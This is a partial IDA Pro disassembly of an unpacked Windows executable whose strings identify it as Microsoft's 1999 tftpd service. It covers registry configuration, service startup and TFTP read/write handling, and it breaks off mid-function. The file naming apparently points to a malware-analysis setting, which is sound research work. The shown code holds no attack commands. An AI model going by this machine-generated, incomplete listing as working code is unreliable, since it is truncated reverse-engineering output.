;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer,	std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer,	std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	9F3F2DE3859A766E3A8DF581D30DA853

; File Name   :	u:\work\9f3f2de3859a766e3a8df581d30da853_unpacked.exe
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	1000000
; Section 1. (virtual address 00001000)
; Virtual size			: 000033C4 (  13252.)
; Section size in file		: 000033C4 (  13252.)
; Offset to raw	data for section: 00001000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default

		include	uni.inc	; see unicode subdir of	ida for	info on	unicode

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
_text		segment	para public 'CODE' use32
		assume cs:_text
		;org 1001000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_1001000	dd 77DB82ACh	dword_1001004	dd 77DB2985h	dword_1001008	dd 77DB858Eh	dword_100100C	dd 77DB7D4Dh	dword_1001010	dd 77DB2C54h	dword_1001014	dd 77DC9694h						; sub_1001DEB+6Br ...
		dd 0
dword_100101C	dd 77E9B0BBh	dword_1001020	dd 77E94CA6h	dword_1001024	dd 77E9C37Ah	dword_1001028	dd 77F877E0h	dword_100102C	dd 77E9C4E4h						; sub_1002F31+1C3r ...
dword_1001030	dd 77E8670Dh	dword_1001034	dd 77E86F37h	dword_1001038	dd 77E8668Ch						; sub_1001665:loc_1001762r ...
dword_100103C	dd 77E88778h						; sub_1001A91+1ABr
dword_1001040	dd 77E8B217h						; sub_10018DB+B4r ...
dword_1001044	dd 77E88D0Fh						; sub_10019F0+14r ...
dword_1001048	dd 77E85304h	dword_100104C	dd 77F8AA7Dh						; sub_1001A91+B5r ...
dword_1001050	dd 77FC9C41h	dword_1001054	dd 77E8A6C8h						; sub_1001E73+9Er ...
dword_1001058	dd 77F8AA4Ch						; sub_1001A91+4Er ...
dword_100105C	dd 77E94A02h, 77E9E673h, 77FC976Bh, 77E9310Fh					; sub_1001A91+2C1r ...
dword_100106C	dd 77E84B74h						; sub_100205A+4Er
dword_1001070	dd 77F89789h	dword_1001074	dd 77E9CFC6h			dd 0
dword_100107C	dd 78001DEAh	dword_1001080	dd 78003E70h	dword_1001084	dd 7800B426h	dword_1001088	dd 78014EE9h	dword_100108C	dd 78014DABh	dword_1001090	dd 7801D884h	dword_1001094	dd 78001000h						; sub_100205A+93r ...
dword_1001098	dd 78001EC9h	dword_100109C	dd 78012188h	dword_10010A0	dd 780010EDh						; sub_1001F54+47r ...
dword_10010A4	dd 7802A875h						; sub_1001DEB+8r
dword_10010A8	dd 78017A09h	dword_10010AC	dd 7800C9ACh						; sub_10027E1+77r ...
dword_10010B0	dd 78017E4Bh, 78022AA9h					; sub_1001665+1DBr
dword_10010B8	dd 7802A38Bh						; sub_1001DEB+19r
dword_10010BC	dd 78003C1Eh	dword_10010C0	dd 7800F56Ah	dword_10010C4	dd 78003E5Ah	dword_10010C8	dd 78003E64h	dword_10010CC	dd 78003E6Ah	dword_10010D0	dd 7803BB70h	dword_10010D4	dd 78025147h	dword_10010D8	dd 7800BB9Eh	dword_10010DC	dd 7800F7DCh, 7800B908h					; .text:01003B7Ar
dword_10010E4	dd 7801D1CFh						; sub_100333A+1B9r
dword_10010E8	dd 78014B25h	dword_10010EC	dd 7800269Eh						; sub_1001665+C0r ...
		dd 0
dword_10010F4	dd 75031311h	dword_10010F8	dd 75032B3Ch						; sub_1001A91+12Br ...
dword_10010FC	dd 75034A6Ah	dword_1001100	dd 75035502h	dword_1001104	dd 75032B57h						; sub_100230A+Fr ...
dword_1001108	dd 7503D027h	dword_100110C	dd 75032B57h						; sub_1002A3D+40r ...
; ---------------------------------------------------------------------------

locret_1001110:				; DATA XREF: sub_1001A91+10Fr
		retf
; ---------------------------------------------------------------------------
		db 0ACh, 3, 75h
dword_1001114	dd 7503125Ah	dword_1001118	dd 7503894Bh	dword_100111C	dd 75033284h						; sub_100205A+E7r ...
dword_1001120	dd 75035413h						; sub_1002F31+64r ...
dword_1001124	dd 75033A14h						; sub_1002F31+256r ...
dword_1001128	dd 750390C0h	dword_100112C	dd 75033832h						; sub_100333A+1EBr
dword_1001130	dd 7503306Fh						; sub_1002A3D+65r ...
		align 8
dword_1001138	dd 77347866h	dword_100113C	dd 773425A3h			dd 0
dword_1001144	dd 77F82A70h	dword_1001148	dd 77F8A557h	dword_100114C	dd 77FB6307h	dword_1001150	dd 77F92A89h						; sub_100333A+95r
dword_1001154	dd 77F97C81h						; sub_1002B5E+114r ...
dword_1001158	dd 77F816E4h						; sub_1002A3D+FDr ...
dword_100115C	dd 77F8F1D6h	dword_1001160	dd 77F9431Dh						; sub_10023D8+F2r
dword_1001164	dd 77F936B1h	dword_1001168	dd 77F912B1h						; sub_1002901+35r
dword_100116C	dd 77F8F73Ch	dword_1001170	dd 77F979C8h	dword_1001174	dd 77F8D7C7h						; sub_10018DB+D6r
dword_1001178	dd 77F975A5h						; sub_1002F31+34Dr ...
		dd 2 dup(0)
		dd 37ECADD7h, 0
		dd 4, 110h, 0
		dd 4C00h, 0
		dd 37ECADD7h, 0
		dd 3, 310h, 0
		dd 4D10h, 0
		dd 37ECADD7h, 0
		dd 6, 2	dup(0)
		dd 5020h, 0
		dd 37ECADD7h, 0
		dd 2, 1Ah, 0
		db 90h
		db 0FEh, 0A7h, 0FFh
aDNtPrivateNetS	db 'D:\nt\private\net\sockets\tcpsvcs\tftpd\tftpd.c built Sep 24 1999'
		db ' 22:17:18',0Ah,0
aOWritableFiles	db ' o writable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+C4o
aWritable	db 'writable',0         ; DATA XREF: sub_1001570+BFo
					; sub_10037BF+121o
		align 4
aOReadableFiles	db ' o Readable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+B6o
aReadable	db 'readable',0         ; DATA XREF: sub_1001570+B1o
					; sub_10037BF+F1o
		align 4
aOValidmastersK	db ' o ValidMasters   keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+A8o
aMasters	db 'masters',0          ; DATA XREF: sub_1001570+A3o
					; sub_10037BF+C1o
aOValidclientsK	db ' o ValidClients   keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+9Ao
aClients	db 'clients',0          ; DATA XREF: sub_1001570+95o
					; sub_10037BF+8Eo
aTheseKeysAreSh	db 'These keys are shell patterns with * and ? (see examples above):',0Ah
					; DATA XREF: sub_1001570+8Do
		db 0
		align 4
aOStartdirector	db ' o StartDirectory keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+84o
aDirectory	db 'directory',0        ; DATA XREF: sub_1001570+7Fo
					; sub_10037BF+5Co
		align 4
aRegistryKeyNam	db 'Registry key names, all strings: HKEY_LOCAL_MACHINE %s',0Ah,0
					; DATA XREF: sub_1001570+76o
aSystemCurrentc	db 'System\CurrentControlSet\Services\tftpd\parameters',0
					; DATA XREF: sub_1001570+71o
					; sub_10037BF+13o
		align 10h
aTftpd_logfileI	db ' TFTPD_LOGFILE     is %s',0Ah ; DATA XREF: sub_1001570+68o
		db 0Ah,0
		align 4
aTftpd_log	db 'tftpd.log',0        ; DATA XREF: sub_1001570+63o
					; sub_1001665+1D6o
		align 4
aTftpd_default_	db ' TFTPD_DEFAULT_DIR is %s',0Ah,0 ; DATA XREF: sub_1001570+5Ao
		align 4
aTftpdroot	db '\tftpdroot\',0      ; DATA XREF: sub_1001570+55o
					; sub_1003910+1Eo
a?		db '-?',0               ; DATA XREF: sub_1001570+10o
		align 4
aA		db 'a+',0               ; DATA XREF: sub_1001665+1D1o
		align 4
aTftp		db 'tftp',0             ; DATA XREF: sub_100205A+31o
		align 10h
aUdp		db 'udp',0              ; DATA XREF: sub_100205A+2Co
aOptionNegotiat	db 'Option negotiation failure',0 ; DATA XREF: .data:01005CE0o
		align 10h
aNoSuchUser	db 'No such user',0     ; DATA XREF: .data:01005CDCo
		align 10h
aFileAlreadyExi	db 'File already exists',0 ; DATA XREF: .data:01005CD8o
aUnknownTransfe	db 'Unknown transfer ID',0 ; DATA XREF: .data:01005CD4o
aIllegalTftpOpe	db 'Illegal TFTP operation',0 ; DATA XREF: .data:01005CD0o
		align 10h
aDiskFullOrAllo	db 'Disk full or allocation exceeded',0 ; DATA XREF: .data:01005CCCo
		align 4
aAccessViolatio	db 'Access violation',0 ; DATA XREF: .data:01005CC8o
		align 4
aFileNotFound	db 'File not found',0   ; DATA XREF: .data:01005CC4o
		align 4
aErrorUndefined	db 'Error undefined',0  ; DATA XREF: .data:off_1005CC0o
aTsize		db 'tsize',0            ; DATA XREF: sub_10023D8:loc_100251Ao
		align 10h
aTimeout_0	db 'timeout',0          ; DATA XREF: sub_10023D8:loc_1002498o
aBlksize	db 'blksize',0          ; DATA XREF: sub_10023D8+4Eo
aTimeout	db 'Timeout',0          ; DATA XREF: sub_1002A3D+D2o
aInsufficientRe	db 'Insufficient resources',0 ; DATA XREF: sub_1002F31:loc_1003197o
					; sub_100333A+201o ...
		align 10h
aFileNameTooLon	db 'File name too long',0 ; DATA XREF: sub_1002F31+195o
					; sub_100333A+1A0o
		align 4
aMalformedFileN	db 'Malformed file name',0 ; DATA XREF: sub_1002F31+139o
					; sub_100333A+159o
aOctet		db 'octet',0            ; DATA XREF: sub_1002F31+D2o
					; sub_100333A:loc_100341Fo
		align 10h
aNetascii	db 'netascii',0         ; DATA XREF: sub_1002F31+9Fo
					; sub_100333A:loc_10033E1o
		align 4
asc_100155C:				; DATA XREF: sub_1003910+7Fo
		unicode	0, <\>,0
dword_1001560	dd 0FFFFFFFFh, 1003B5Eh, 1003B73h, 0
; =============== S U B	R O U T	I N E =======================================



sub_1001570	proc near		; CODE XREF: .text:01003B4Ap

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		cmp	[esp+arg_0], 1
		push	esi
		jle	loc_1001646
		mov	eax, [esp+4+arg_4]
		mov	esi, offset a?	; "-?"
		mov	eax, [eax+4]


loc_1001588:				; CODE XREF: sub_1001570+34j
		mov	dl, [eax]
		mov	cl, dl
		cmp	dl, [esi]
		jnz	short loc_10015AA
		test	cl, cl
		jz	short loc_10015A6
		mov	dl, [eax+1]
		mov	cl, dl
		cmp	dl, [esi+1]
		jnz	short loc_10015AA
		inc	eax
		inc	eax
		inc	esi
		inc	esi
		test	cl, cl
		jnz	short loc_1001588


loc_10015A6:				; CODE XREF: sub_1001570+22j
		xor	eax, eax
		jmp	short loc_10015AF
; ---------------------------------------------------------------------------


loc_10015AA:				; CODE XREF: sub_1001570+1Ej
					; sub_1001570+2Cj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh


loc_10015AF:				; CODE XREF: sub_1001570+38j
		test	eax, eax
		jnz	loc_1001646
		mov	esi, ds:dword_10010D4
		push	offset asc_1005010 ; " ======================================"...
		call	esi ; dword_10010D4
		pop	ecx
		push	offset aTftpdroot ; "\\tftpdroot\\"
		push	offset aTftpd_default_ ; " TFTPD_DEFAULT_DIR is	%s\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aTftpd_log ; "tftpd.log"
		push	offset aTftpd_logfileI ; " TFTPD_LOGFILE     is	%s\n\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\tftpd"...
		push	offset aRegistryKeyNam ; "Registry key names, all strings: HKEY_L"...
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aDirectory ; "directory"
		push	offset aOStartdirector ; " o StartDirectory keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aTheseKeysAreSh ; "These	keys are shell patterns	with * an"...
		call	esi ; dword_10010D4
		pop	ecx
		push	offset aClients	; "clients"
		push	offset aOValidclientsK ; " o ValidClients   keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aMasters	; "masters"
		push	offset aOValidmastersK ; " o ValidMasters   keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aReadable ; "readable"
		push	offset aOReadableFiles ; " o Readable files keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	offset aWritable ; "writable"
		push	offset aOWritableFiles ; " o writable files keyname \"%s\"\n"
		call	esi ; dword_10010D4
		pop	ecx
		pop	ecx
		push	0FFFFFFFFh
		call	ds:dword_10010EC
		pop	ecx


loc_1001646:				; CODE XREF: sub_1001570+6j
					; sub_1001570+41j
		push	offset off_1005CB0
		call	ds:dword_1001004
		test	eax, eax
		jnz	short loc_100165B
		call	ds:dword_1001038


loc_100165B:				; CODE XREF: sub_1001570+E3j
		push	0
		call	ds:dword_100101C
		pop	esi
		retn
sub_1001570	endp


; =============== S U B	R O U T	I N E =======================================



sub_1001665	proc near		; DATA XREF: .data:01005CB4o

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ebx
		push	ebp
		push	esi
		push	edi
		xor	ebp, ebp
		push	offset sub_1001DEB
		push	offset aTftpd	; "Tftpd"
		mov	dword_1006120, 30h
		mov	dword_1006124, 2
		mov	dword_1006128, ebp
		mov	dword_1006134, 1
		mov	dword_1006138, 4E20h
		mov	dword_100612C, ebp
		mov	dword_1006130, ebp
		call	ds:dword_1001010
		cmp	eax, ebp
		mov	dword_1006044, eax
		jz	loc_1001762
		mov	esi, ds:dword_1001014
		mov	edi, offset dword_1006120
		push	edi
		push	eax
		call	esi ; dword_1001014
		cmp	eax, ebp
		jz	loc_1001762
		mov	ebx, ds:dword_1001040
		push	ebp
		push	ebp
		push	ebp
		push	ebp
		call	ebx ; dword_1001040
		push	ebp
		push	ebp
		push	ebp
		push	ebp
		mov	dword_1005DDC, eax
		call	ebx ; dword_1001040
		cmp	dword_1005DDC, ebp
		mov	dword_1005DE0, eax
		jz	short loc_100171C
		cmp	eax, ebp
		jz	short loc_100171C
		push	offset dword_1006140
		push	101h
		call	ds:dword_10010FC
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_1001735
		call	ds:dword_10010F8


loc_100171C:				; CODE XREF: sub_1001665+96j
					; sub_1001665+9Aj ...
		push	1Fh
		call	sub_1001E73
		push	1
		call	ds:dword_10010EC
		pop	ecx


loc_100172C:				; CODE XREF: sub_1001665+218j
					; sub_1001665+224j
		pop	edi
		pop	esi
		pop	ebp
		xor	eax, eax
		pop	ebx
		retn	8
; ---------------------------------------------------------------------------


loc_1001735:				; CODE XREF: sub_1001665+AFj
		push	edi
		mov	dword_1006124, 4
		push	dword_1006044
		mov	dword_1006128, 7
		mov	dword_1006134, ebp
		mov	dword_1006138, ebp
		call	esi ; dword_1001014
		cmp	eax, ebp
		jnz	short loc_100176A


loc_1001762:				; CODE XREF: sub_1001665+57j
					; sub_1001665+6Ej
		call	ds:dword_1001038
		jmp	short loc_100171C
; ---------------------------------------------------------------------------


loc_100176A:				; CODE XREF: sub_1001665+FBj
		push	9
		pop	ecx
		xor	eax, eax
		mov	edx, offset dword_10060C0
		mov	edi, edx
		rep stosd
		push	edx
		call	ds:dword_10010A4
		pop	ecx
		mov	edx, [esp+10h+arg_0]
		dec	edx
		mov	ebx, (offset dword_1005E07+1)
		jz	short loc_10017F3
		mov	eax, [esp+10h+arg_4]
		lea	eax, [eax+edx*4]
		mov	[esp+10h+arg_0], eax


loc_1001797:				; CODE XREF: sub_1001665+18Cj
		mov	eax, [esp+10h+arg_0]
		mov	eax, [eax]
		cmp	byte ptr [eax],	2Dh
		jnz	short loc_10017F3
		movsx	ecx, byte ptr [eax+1]
		sub	ecx, 64h
		jz	short loc_10017C9
		dec	ecx
		jz	short loc_10017BD
		dec	ecx
		jnz	short loc_10017E9
		mov	dword_1005DD8, 1
		jmp	short loc_10017E9
; ---------------------------------------------------------------------------


loc_10017BD:				; CODE XREF: sub_1001665+147j
		mov	dword_1005DD4, 1
		jmp	short loc_10017E9
; ---------------------------------------------------------------------------


loc_10017C9:				; CODE XREF: sub_1001665+144j
		lea	edi, [eax+2]
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb


loc_10017E9:				; CODE XREF: sub_1001665+14Aj
					; sub_1001665+156j ...
		sub	[esp+10h+arg_0], 4
		dec	edx
		cmp	edx, ebp
		ja	short loc_1001797


loc_10017F3:				; CODE XREF: sub_1001665+125j
					; sub_1001665+13Bj
		call	sub_10037BF
		call	sub_1003910
		mov	esi, ds:dword_10010A8
		push	ebx
		call	esi ; dword_10010A8
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jnz	short loc_100182E
		call	ds:dword_10010AC
		push	ebx
		call	ds:dword_10010B0
		cmp	eax, ebp
		pop	ecx
		jnz	loc_100171C
		push	ebx
		call	esi ; dword_10010A8
		cmp	eax, ebp
		pop	ecx
		jnz	loc_100171C


loc_100182E:				; CODE XREF: sub_1001665+1A5j
		cmp	dword_1005DD8, ebp
		jz	short loc_1001857
		push	offset aA	; "a+"
		push	offset aTftpd_log ; "tftpd.log"
		call	ds:dword_10010B0+4
		pop	ecx
		cmp	eax, ebp
		pop	ecx
		mov	dword_1005DD0, eax
		jnz	short loc_1001857
		mov	dword_1005DD8, ebp


loc_1001857:				; CODE XREF: sub_1001665+1CFj
					; sub_1001665+1EAj
		push	offset dword_10060C0
		call	ds:dword_10010B8
		pop	ecx
		call	sub_10018DB
		call	sub_10019F0
		push	0FFFFFFFFh
		push	dword_1005DDC
		call	ds:dword_100103C
		cmp	eax, ebp
		jz	loc_100172C
		call	ds:dword_1001038
		jmp	loc_100172C
sub_1001665	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100188E	proc near		; CODE XREF: sub_100205A+D5p
					; sub_1002F31+2A8p ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= byte ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	3
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	ds:dword_1001100
		test	eax, eax
		jz	short loc_10018AE
		call	ds:dword_1001038
		xor	eax, eax
		jmp	short locret_10018D7
; ---------------------------------------------------------------------------


loc_10018AE:				; CODE XREF: sub_100188E+14j
		test	[ebp+arg_8], 1
		push	0
		push	0FFFFFFFFh
		push	[ebp+arg_0]
		jz	short loc_10018C2
		push	offset loc_1001D74
		jmp	short loc_10018C7
; ---------------------------------------------------------------------------


loc_10018C2:				; CODE XREF: sub_100188E+2Bj
		push	offset loc_1001DDB


loc_10018C7:				; CODE XREF: sub_100188E+32j
		push	[ebp+arg_4]
		lea	eax, [ebp+var_4]
		push	eax
		call	ds:dword_1001174
		mov	eax, [ebp+var_4]

locret_10018D7:				; CODE XREF: sub_100188E+1Ej
		leave
		retn	0Ch
sub_100188E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_10018DB	proc near		; CODE XREF: sub_1001665+1FEp

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		push	esi
		mov	esi, ds:dword_1001044
		push	edi
		push	offset dword_1006080
		call	esi ; dword_1001044
		push	offset dword_1006020
		call	esi ; dword_1001044
		mov	eax, offset dword_1006098
		mov	dword_100609C, eax
		mov	dword_1006098, eax
		mov	eax, offset dword_1006038
		mov	dword_100603C, eax
		mov	dword_1006038, eax
		lea	eax, [ebp+var_4]
		push	eax
		call	sub_1001FA6
		xor	esi, esi
		test	eax, eax
		jnz	short loc_1001957
		mov	eax, [ebp+var_4]
		xor	ebx, ebx
		cmp	[eax], esi
		jbe	short loc_100194F
		xor	edi, edi


loc_100192E:				; CODE XREF: sub_10018DB+72j
		mov	ecx, [eax+edi+4]
		cmp	ecx, esi
		jz	short loc_1001947
		cmp	ecx, 100007Fh
		jz	short loc_1001947
		push	ecx
		call	sub_100205A
		mov	eax, [ebp+var_4]


loc_1001947:				; CODE XREF: sub_10018DB+59j
					; sub_10018DB+61j
		inc	ebx
		add	edi, 18h
		cmp	ebx, [eax]
		jb	short loc_100192E


loc_100194F:				; CODE XREF: sub_10018DB+4Fj
		push	eax
		call	ds:dword_10010A0
		pop	ecx


loc_1001957:				; CODE XREF: sub_10018DB+46j
		push	offset dword_10060A0
		call	ds:dword_1001170
		cmp	eax, esi
		jnz	loc_10019EB
		mov	eax, 0EA60h
		push	esi
		push	eax
		push	eax
		push	esi
		push	offset sub_10029BA
		push	offset dword_1006048
		push	dword_10060A0
		call	ds:dword_1001178
		push	esi
		push	esi
		push	esi
		push	esi
		mov	edi, eax
		call	ds:dword_1001040
		cmp	eax, esi
		mov	dword_1005DF8, eax
		jnz	short loc_10019A2
		mov	eax, edi
		jmp	short loc_10019EB
; ---------------------------------------------------------------------------


loc_10019A2:				; CODE XREF: sub_10018DB+C1j
		push	esi
		push	0FFFFFFFFh
		push	esi
		push	offset sub_1002219
		push	eax
		push	offset dword_1005DFC
		call	ds:dword_1001174
		cmp	eax, esi
		jnz	short loc_10019EB
		mov	ecx, offset dword_1006100
		xor	eax, eax
		mov	edi, ecx
		push	ecx
		stosd
		stosd
		stosd
		stosd
		stosd
		mov	eax, dword_1005DF8
		push	offset dword_1005E00
		mov	dword_1006110, eax
		call	sub_1003A44
		cmp	eax, esi
		jz	short loc_10019E9
		cmp	eax, 3E5h
		jnz	short loc_10019EB


loc_10019E9:				; CODE XREF: sub_10018DB+105j
		xor	eax, eax


loc_10019EB:				; CODE XREF: sub_10018DB+89j
					; sub_10018DB+C5j ...
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_10018DB	endp


; =============== S U B	R O U T	I N E =======================================



sub_10019F0	proc near		; CODE XREF: sub_1001665+203p
		mov	eax, offset dword_1006078
		push	offset dword_1006060
		mov	dword_100607C, eax
		mov	dword_1006078, eax
		call	ds:dword_1001044
		push	0
		push	0EFD1Ch
		push	0
		call	ds:dword_1001048
		mov	dword_1005DEC, eax
		retn
sub_10019F0	endp


; =============== S U B	R O U T	I N E =======================================



sub_1001A1F	proc near		; CODE XREF: sub_10029BA+79p
		push	ebx
		push	esi
		mov	ebx, offset dword_1006060
		push	edi
		push	ebx
		xor	esi, esi
		call	ds:dword_1001058
		mov	eax, dword_1005DF0
		sub	eax, dword_1005DF4
		cmp	eax, 0Ah
		jbe	short loc_1001A46
		shr	eax, 1
		mov	esi, eax
		jmp	short loc_1001A4E
; ---------------------------------------------------------------------------


loc_1001A46:				; CODE XREF: sub_1001A1F+1Fj
		cmp	eax, 3
		jbe	short loc_1001A4E
		push	2
		pop	esi


loc_1001A4E:				; CODE XREF: sub_1001A1F+25j
					; sub_1001A1F+2Aj
		test	esi, esi
		jbe	short loc_1001A86
		mov	edi, esi


loc_1001A54:				; CODE XREF: sub_1001A1F+65j
		mov	eax, dword_1006078
		mov	esi, eax
		mov	ecx, [eax]
		mov	eax, [eax+4]
		mov	[eax], ecx
		mov	[ecx+4], eax
		push	dword ptr [esi+30h]
		call	ds:dword_1001054
		push	esi
		push	0
		push	dword_1005DEC
		call	ds:dword_1001050
		dec	dword_1005DF0
		dec	edi
		jnz	short loc_1001A54


loc_1001A86:				; CODE XREF: sub_1001A1F+31j
		push	ebx
		call	ds:dword_100104C
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_1001A1F	endp


; =============== S U B	R O U T	I N E =======================================



sub_1001A91	proc near		; CODE XREF: .text:01001DCCp
					; .text:01001DE1p

var_68		= byte ptr -68h
var_4C		= dword	ptr -4Ch
var_48		= dword	ptr -48h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_30		= byte ptr -30h
var_28		= dword	ptr -28h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_10		= byte ptr -10h
var_8		= dword	ptr -8
arg_0		= dword	ptr  4
arg_10		= byte ptr  14h
arg_FF9C	= dword	ptr  0FFA0h
arg_FFA0	= dword	ptr  0FFA4h
arg_FFA4	= dword	ptr  0FFA8h
arg_FFA8	= dword	ptr  0FFACh
arg_FFD4	= dword	ptr  0FFD8h
arg_FFD8	= dword	ptr  0FFDCh
arg_10004	= dword	ptr  10008h

		mov	eax, 10004h
		call	sub_1003A3E
		push	ebx
		push	ebp
		xor	ebp, ebp
		push	esi
		push	edi
		mov	[esp+10h], ebp
		mov	ebx, offset dword_1006060


loc_1001AAA:				; CODE XREF: sub_1001A91+291j
		lea	eax, [esp+10h+arg_0]
		push	eax
		push	4004667Fh
		push	[esp+18h+arg_10004]
		call	ds:dword_1001114
		cmp	eax, ebp
		jnz	loc_1001D27
		cmp	[esp+1Ch+var_8], ebp
		jz	loc_1001D65
		xor	eax, eax
		lea	edi, [esp+1Ch+arg_10]
		stosd
		stosd
		stosd
		stosd
		push	ebx
		stosd
		call	ds:dword_1001058
		mov	eax, dword_1006078
		inc	dword_1005DF4
		cmp	eax, offset dword_1006078
		jz	short loc_1001B11
		mov	ecx, [eax]
		mov	esi, eax
		mov	eax, [eax+4]
		mov	[eax], ecx
		mov	[ecx+4], eax
		push	dword ptr [esi+30h]
		call	ds:dword_100105C+0Ch
		mov	eax, [esi+30h]
		jmp	short loc_1001B41
; ---------------------------------------------------------------------------


loc_1001B11:				; CODE XREF: sub_1001A91+64j
		inc	dword_1005DF0
		push	2FF6Ch
		push	8
		push	dword_1005DEC
		call	ds:dword_100105C+8
		mov	esi, eax
		cmp	esi, ebp
		jz	loc_1001D5E
		push	ebp
		push	ebp
		push	ebp
		push	ebp
		call	ds:dword_1001040
		mov	[esi+30h], eax


loc_1001B41:				; CODE XREF: sub_1001A91+7Ej
		push	ebx
		mov	[esp+40h+arg_0], eax
		call	ds:dword_100104C
		lea	ebp, [esi+34h]
		mov	ecx, 3FEFh
		xor	eax, eax
		mov	edi, ebp
		rep stosd
		stosb
		mov	eax, [esp+40h+arg_FFD8]
		mov	[esp+40h+var_1C], ebp
		mov	[esp+40h+var_20], 0FFBDh
		mov	[esp+40h+var_28], 10h
		mov	[esi+1Ch], eax
		lea	eax, [esp+40h+var_10]
		push	0
		push	eax
		lea	eax, [esp+48h+var_28]
		lea	edi, [esi+2Ch]
		push	eax
		lea	eax, [esi+0Ch]
		push	eax
		lea	eax, [esp+50h+var_30]
		push	eax
		push	edi
		lea	eax, [esp+58h+var_20]
		push	1
		push	eax
		push	[esp+60h+arg_FFD4]
		call	dword ptr ds:locret_1001110
		mov	[esp+64h+var_48], eax
		mov	ax, [esi+0Eh]
		push	eax
		call	ds:dword_100110C
		cmp	[esp+68h+var_4C], 0
		jz	short loc_1001C34
		call	ds:dword_10010F8
		cmp	eax, 3E5h
		jnz	loc_1001D2F
		mov	eax, dword_1005DDC
		push	0FFFFFFFFh
		mov	[esp+6Ch+var_40], eax
		mov	eax, [esp+6Ch+var_28]
		mov	[esp+6Ch+var_3C], eax
		lea	eax, [esp+6Ch+var_40]
		push	0
		push	eax
		push	2
		call	ds:dword_100105C+4
		cmp	eax, 0FFFFFFFFh
		jz	loc_1001D2F
		cmp	eax, 102h
		jz	loc_1001D2F
		test	eax, eax
		jz	loc_1001D2F
		lea	eax, [esp+78h+var_68]
		push	eax
		push	0
		lea	eax, [esp+80h+var_48]
		push	edi
		push	eax
		push	[esp+88h+arg_FF9C]
		call	ds:dword_1001108
		test	eax, eax
		jnz	short loc_1001C34
		call	ds:dword_10010F8
		jmp	loc_1001CEA
; ---------------------------------------------------------------------------


loc_1001C34:				; CODE XREF: sub_1001A91+129j
					; sub_1001A91+196j
		push	0
		push	dword_1005DDC
		call	ds:dword_100103C
		test	eax, eax
		jz	loc_1001D2F
		cmp	dword ptr [edi], 2
		jl	loc_1001CEA
		xor	edi, edi
		cmp	[esp+70h+arg_FFA8], edi
		jz	short loc_1001CDA
		mov	ax, [ebp+0]
		push	eax
		call	ds:dword_1001104
		movzx	ecx, ax
		test	ecx, ecx
		jle	short loc_1001CB8
		cmp	ecx, 2
		jle	short loc_1001C81
		cmp	ecx, 4
		jz	short loc_1001CB8
		cmp	ecx, 5
		jnz	short loc_1001CB8
		jmp	short loc_1001CEA
; ---------------------------------------------------------------------------


loc_1001C81:				; CODE XREF: sub_1001A91+1E2j
		cmp	ax, 1
		jnz	short loc_1001C94
		inc	dword_10060C4
		mov	edi, offset sub_1002F31
		jmp	short loc_1001CA5
; ---------------------------------------------------------------------------


loc_1001C94:				; CODE XREF: sub_1001A91+1F4j
		cmp	ax, 2
		jnz	short loc_1001CA5
		inc	dword_10060C8
		mov	edi, offset sub_100333A


loc_1001CA5:				; CODE XREF: sub_1001A91+201j
					; sub_1001A91+207j
		mov	eax, [esp+74h+arg_FFA0]
		test	edi, edi
		mov	[esi+8], eax
		jz	short loc_1001CEA
		push	esi
		call	edi ; sub_1002F31
		jmp	short loc_1001CEA
; ---------------------------------------------------------------------------


loc_1001CB8:				; CODE XREF: sub_1001A91+1DDj
					; sub_1001A91+1E7j ...
		push	0
		push	4
		push	[esp+7Ch+arg_FFA0]
		inc	dword_10060CC
		lea	eax, [esp+80h+var_20]
		push	eax
		lea	eax, [esp+84h+var_30]
		push	eax
		call	sub_100230A
